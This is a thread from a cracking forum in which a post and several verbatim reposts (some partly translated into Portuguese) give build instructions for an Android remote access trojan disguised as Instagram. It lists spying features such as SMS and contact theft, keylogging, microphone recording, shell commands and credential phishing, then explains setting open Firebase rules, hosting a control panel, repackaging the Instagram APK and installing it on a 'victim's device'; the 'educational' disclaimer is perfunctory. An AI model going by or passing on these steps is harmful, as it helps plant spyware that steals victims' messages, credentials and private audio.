Method/Tut - A multifunctional Android RAT | CraxTube | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

Method/Tut A multifunctional Android RAT

Method/Tut A multifunctional Android RAT

LV
3
 

cuthniki

PRO Member
Member
Crax Cloud
Joined
Dec 14, 2022
Threads
430
Likes
864
Awards
9
Credits
39,497©
Cash
1$
A multifunctional Android RAT with GUI based Web Panel without port forwarding


Features

• Read all the files of Internal Storage

• Download Any Media to your Device from Victims Device

• Get all the system information of Victim Device

• Retrieve the List of Installed Applications

• Retrive SMS

• Retrive Call Logs

• Retrive Contacts

• Send SMS

• Gets all the Notifications

• Keylogger

• Admin Permission

• Show Phishing Pages to steal credentials through notification.

• Steal credentials through pre built phishing pages

• Open any suspicious website through notification to steal credentials.

• Record Audio through Mic

• Play music in Victim's device

• Vibrate Device

• Text To Speech

• Turn On/Off Torch Light

• Change Wallpaper

• Run shell Commands

• Get Clipboard text (Only When app's Activity is visible)

• Launch Any URL (Only When app's Activity is visible)

• Pre Binded with Instagram Webview Phishing

• Runs In Background

• Auto Starts on restarting the device

• Auto Starts when any notification arrives

• No port forwarding needed

Requirements

• Firebase Account

• ApkEasy Tool ( For PC ) or ApkTool M ( for Android)

How to Build
Firebase Setup

• Create an Firebase Account and afterwords create a new project with any name.

• Enable Firebase Database and Firebase Storage.

• In Firebase Database Click on the rules and set .read and .write to true

• { "rules": { ".read": "true", ".write": "true" } }

• In Firebase Storage allow reads and writes for all paths.

• rules_version = '2'; service firebase.storage { match /b/{bucket}/o { match /{allPaths=**} { allow read, write } } }

• Now Go to project overview and create an Android App and download the google-services.json file.

• Also create a web app and copy the config of webapp.

Panel Setup

• You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.

• Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.

• Save the file , Your Panel Setup is completed.

Android RAT

• Download Instagram.apk

• Decompile it using any Decompiler recommend above.

• Now open res/values/strings.xml file.

• Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5

• Example

<string name="firebase_database_url">https://your_database_url.firebase.com</string> <string name="google_api_key">your_api_key</string> <string name="google_app_id">your_app_id</string> <string name="google_storage_bucket">your_storage_bucket_url</string> <string name="project_id">project_id</string>

• Now compile the code with appt2.

• Install the app in victim's device and give all the permissions after that the connection will show up in web panel.

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program
 
Last edited:
  • Like
Reactions: zerointel, itachii171 and sinna
LV
1
 

Xddddispss

Member
Joined
Mar 15, 2023
Threads
11
Likes
39
Awards
4
Credits
7,863©
Cash
0$
A multifunctional Android RAT with GUI based Web Panel without port forwarding


Features

• Read all the files of Internal Storage

• Download Any Media to your Device from Victims Device

• Get all the system information of Victim Device

• Retrieve the List of Installed Applications

• Retrive SMS

• Retrive Call Logs

• Retrive Contacts

• Send SMS

• Gets all the Notifications

• Keylogger

• Admin Permission

• Show Phishing Pages to steal credentials through notification.

• Steal credentials through pre built phishing pages

• Open any suspicious website through notification to steal credentials.

• Record Audio through Mic

• Play music in Victim's device

• Vibrate Device

• Text To Speech

• Turn On/Off Torch Light

• Change Wallpaper

• Run shell Commands

• Get Clipboard text (Only When app's Activity is visible)

• Launch Any URL (Only When app's Activity is visible)

• Pre Binded with Instagram Webview Phishing

• Runs In Background

• Auto Starts on restarting the device

• Auto Starts when any notification arrives

• No port forwarding needed


Requirements

• Firebase Account

• ApkEasy Tool ( For PC ) or ApkTool M ( for Android)


How to Build
Firebase Setup

• Create an Firebase Account and afterwords create a new project with any name.

• Enable Firebase Database and Firebase Storage.

• In Firebase Database Click on the rules and set .read and .write to true

• { "rules": { ".read": "true", ".write": "true" } }

• In Firebase Storage allow reads and writes for all paths.

• rules_version = '2'; service firebase.storage { match /b/{bucket}/o { match /{allPaths=**} { allow read, write } } }

• Now Go to project overview and create an Android App and download the google-services.json file.

• Also create a web app and copy the config of webapp.


Panel Setup

• You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.

• Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.

• Save the file , Your Panel Setup is completed.


Android RAT

• Download Instagram.apk

• Decompile it using any Decompiler recommend above.

• Now open res/values/strings.xml file.

• Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5

• Example

<string name="firebase_database_url">https://your_database_url.firebase.com</string> <string name="google_api_key">your_api_key</string> <string name="google_app_id">your_app_id</string> <string name="google_storage_bucket">your_storage_bucket_url</string> <string name="project_id">project_id</string>

• Now compile the code with appt2.

• Install the app in victim's device and give all the permissions after that the connection will show up in web panel.

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program
Thanks
 
  • Like
Reactions: zerointel
LV
1
 

itachii171

Member
Joined
Feb 9, 2023
Threads
13
Likes
11
Awards
4
Credits
2,712©
Cash
0$
A multifunctional Android RAT with GUI based Web Panel without port forwarding


Features

• Read all the files of Internal Storage

• Download Any Media to your Device from Victims Device

• Get all the system information of Victim Device

• Retrieve the List of Installed Applications

• Retrive SMS

• Retrive Call Logs

• Retrive Contacts

• Send SMS

• Gets all the Notifications

• Keylogger

• Admin Permission

• Show Phishing Pages to steal credentials through notification.

• Steal credentials through pre built phishing pages

• Open any suspicious website through notification to steal credentials.

• Record Audio through Mic

• Play music in Victim's device

• Vibrate Device

• Text To Speech

• Turn On/Off Torch Light

• Change Wallpaper

• Run shell Commands

• Get Clipboard text (Only When app's Activity is visible)

• Launch Any URL (Only When app's Activity is visible)

• Pre Binded with Instagram Webview Phishing

• Runs In Background

• Auto Starts on restarting the device

• Auto Starts when any notification arrives

• No port forwarding needed


Requirements

• Firebase Account

• ApkEasy Tool ( For PC ) or ApkTool M ( for Android)


How to Build
Firebase Setup

• Create an Firebase Account and afterwords create a new project with any name.

• Enable Firebase Database and Firebase Storage.

• In Firebase Database Click on the rules and set .read and .write to true

• { "rules": { ".read": "true", ".write": "true" } }

• In Firebase Storage allow reads and writes for all paths.

• rules_version = '2'; service firebase.storage { match /b/{bucket}/o { match /{allPaths=**} { allow read, write } } }

• Agora vá para visão geral do projeto e crie um aplicativo Android e baixe o arquivo google-services.json.

• Crie também um aplicativo da web e copie a configuração do webapp.


Configuração do Painel

• Você pode usar Github Pages, Firebase Hosting ou qualquer site de hospedagem (exceto 000webhost) para hospedar o painel.

• Abra o arquivo index.html e, a partir da linha número 16, substitua a configuração pela configuração do aplicativo da web que você criou na Etapa 6.

• Salve o arquivo, a configuração do seu painel está concluída.


Android RAT

• Baixar Instagram.apk

• Descompile-o usando qualquer Decompiler recomendado acima.

• Agora abra o arquivo res/values/strings.xml.

• Substitua os valores de firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id por sua conta do Firebase usando o arquivo google-services.json que você baixou na etapa 5

• Exemplo

<string name="firebase_database_url">https://your_database_url.firebase.com</string> <string name="google_api_key">your_api_key</string> <string name="google_app_id">your_app_id</string> <string name ="google_storage_bucket">your_storage_bucket_url</string> <string name="project_id">project_id</string>

• Agora compile o código com appt2.

• Instale o aplicativo no dispositivo da vítima e dê todas as permissões para que a conexão apareça no painel da web.

PARA SER USADO APENAS PARA FINS EDUCACIONAIS

O uso do AIRAVAT é de TOTAL RESPONSABILIDADE do USUÁRIO FINAL. Os desenvolvedores não assumem nenhuma responsabilidade e NÃO são responsáveis por qualquer uso indevido ou dano causado por este programa
vou testa pra ver
 
  • Like
Reactions: zerointel
LV
1
 

dudreamteam1

Member
Joined
Apr 15, 2023
Threads
12
Likes
18
Awards
4
Credits
2,555©
Cash
0$
A multifunctional Android RAT with GUI based Web Panel without port forwarding


Features

• Read all the files of Internal Storage

• Download Any Media to your Device from Victims Device

• Get all the system information of Victim Device

• Retrieve the List of Installed Applications

• Retrive SMS

• Retrive Call Logs

• Retrive Contacts

• Send SMS

• Gets all the Notifications

• Keylogger

• Admin Permission

• Show Phishing Pages to steal credentials through notification.

• Steal credentials through pre built phishing pages

• Open any suspicious website through notification to steal credentials.

• Record Audio through Mic

• Play music in Victim's device

• Vibrate Device

• Text To Speech

• Turn On/Off Torch Light

• Change Wallpaper

• Run shell Commands

• Get Clipboard text (Only When app's Activity is visible)

• Launch Any URL (Only When app's Activity is visible)

• Pre Binded with Instagram Webview Phishing

• Runs In Background

• Auto Starts on restarting the device

• Auto Starts when any notification arrives

• No port forwarding needed


Requirements

• Firebase Account

• ApkEasy Tool ( For PC ) or ApkTool M ( for Android)


How to Build
Firebase Setup

• Create an Firebase Account and afterwords create a new project with any name.

• Enable Firebase Database and Firebase Storage.

• In Firebase Database Click on the rules and set .read and .write to true

• { "rules": { ".read": "true", ".write": "true" } }

• In Firebase Storage allow reads and writes for all paths.

• rules_version = '2'; service firebase.storage { match /b/{bucket}/o { match /{allPaths=**} { allow read, write } } }

• Agora vá para visão geral do projeto e crie um aplicativo Android e baixe o arquivo google-services.json.

• Crie também um aplicativo da web e copie a configuração do webapp.


Configuração do painel

• Você pode usar Github Pages, Firebase Hosting ou qualquer site de hospedagem (exceto 000webhost) para hospedar o painel.

• Abra o arquivo index.html e, a partir da linha número 16, substitua a configuração pela configuração do aplicativo da web que você criou na Etapa 6.

• Salve o arquivo, a configuração do seu painel está concluída.


Android RAT

• Baixar Instagram.apk

• Descompile-o usando qualquer Decompiler recomendado acima.

• Agora abra o arquivo res/values/strings.xml.

• Substitua os valores de firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id por sua conta do Firebase usando o arquivo google-services.json que você baixou na etapa 5

• Exemplo

<string name="firebase_database_url">https://your_database_url.firebase.com</string> <string name="google_api_key">your_api_key</string> <string name="google_app_id">your_app_id</string> <string name ="google_storage_bucket">your_storage_bucket_url</string> <string name="project_id">project_id</string>

• Agora compile o código com appt2.

• Instale o aplicativo no dispositivo da vítima e dê todas as permissões para que a conexão apareça no painel da web.

PARA SER USADO APENAS PARA FINS EDUCACIONAIS

O uso do AIRAVAT é de TOTAL RESPONSABILIDADE do USUÁRIO FINAL. Os desenvolvedores não assumem nenhuma responsabilidade e NÃO são responsáveis por qualquer uso indevido ou dano causado por este programa
cadee preciso muito
 
  • Like
Reactions: zerointel
LV
1
 

dudreamteam1

Member
Joined
Apr 15, 2023
Threads
12
Likes
18
Awards
4
Credits
2,555©
Cash
0$
A multifunctional Android RAT with GUI based Web Panel without port forwarding


Features

• Read all the files of Internal Storage

• Download Any Media to your Device from Victims Device

• Get all the system information of Victim Device

• Retrieve the List of Installed Applications

• Retrive SMS

• Retrive Call Logs

• Retrive Contacts

• Send SMS

• Gets all the Notifications

• Keylogger

• Admin Permission

• Show Phishing Pages to steal credentials through notification.

• Steal credentials through pre built phishing pages

• Open any suspicious website through notification to steal credentials.

• Record Audio through Mic

• Play music in Victim's device

• Vibrate Device

• Text To Speech

• Turn On/Off Torch Light

• Change Wallpaper

• Run shell Commands

• Get Clipboard text (Only When app's Activity is visible)

• Launch Any URL (Only When app's Activity is visible)

• Pre Binded with Instagram Webview Phishing

• Runs In Background

• Auto Starts on restarting the device

• Auto Starts when any notification arrives

• No port forwarding needed


Requirements

• Firebase Account

• ApkEasy Tool ( For PC ) or ApkTool M ( for Android)


How to Build
Firebase Setup

• Create an Firebase Account and afterwords create a new project with any name.

• Enable Firebase Database and Firebase Storage.

• In Firebase Database Click on the rules and set .read and .write to true

• { "rules": { ".read": "true", ".write": "true" } }

• In Firebase Storage allow reads and writes for all paths.

• rules_version = '2'; service firebase.storage { match /b/{bucket}/o { match /{allPaths=**} { allow read, write } } }

• Agora vá para visão geral do projeto e crie um aplicativo Android e baixe o arquivo google-services.json.

• Crie também um aplicativo da web e copie a configuração do webapp.


Configuração do painel

• Você pode usar Github Pages, Firebase Hosting ou qualquer site de hospedagem (exceto 000webhost) para hospedar o painel.

• Abra o arquivo index.html e, a partir da linha número 16, substitua a configuração pela configuração do aplicativo da web que você criou na Etapa 6.

• Salve o arquivo, a configuração do seu painel está concluída.


Android RAT

• Baixar Instagram.apk

• Descompile-o usando qualquer Decompiler recomendado acima.

• Agora abra o arquivo res/values/strings.xml.

• Substitua os valores de firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id por sua conta do Firebase usando o arquivo google-services.json que você baixou na etapa 5

• Exemplo

<string name="firebase_database_url">https://your_database_url.firebase.com</string> <string name="google_api_key">your_api_key</string> <string name="google_app_id">your_app_id</string> <string name ="google_storage_bucket">your_storage_bucket_url</string> <string name="project_id">project_id</string>

• Agora compile o código com appt2.

• Instale o aplicativo no dispositivo da vítima e dê todas as permissões para que a conexão apareça no painel da web.

PARA SER USADO APENAS PARA FINS EDUCACIONAIS

O uso do AIRAVAT é de TOTAL RESPONSABILIDADE do USUÁRIO FINAL. Os desenvolvedores não assumem nenhuma responsabilidade e NÃO são responsáveis por qualquer uso indevido ou dano causado por este programa
baaaaaa
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Tips

Similar threads

Top Bottom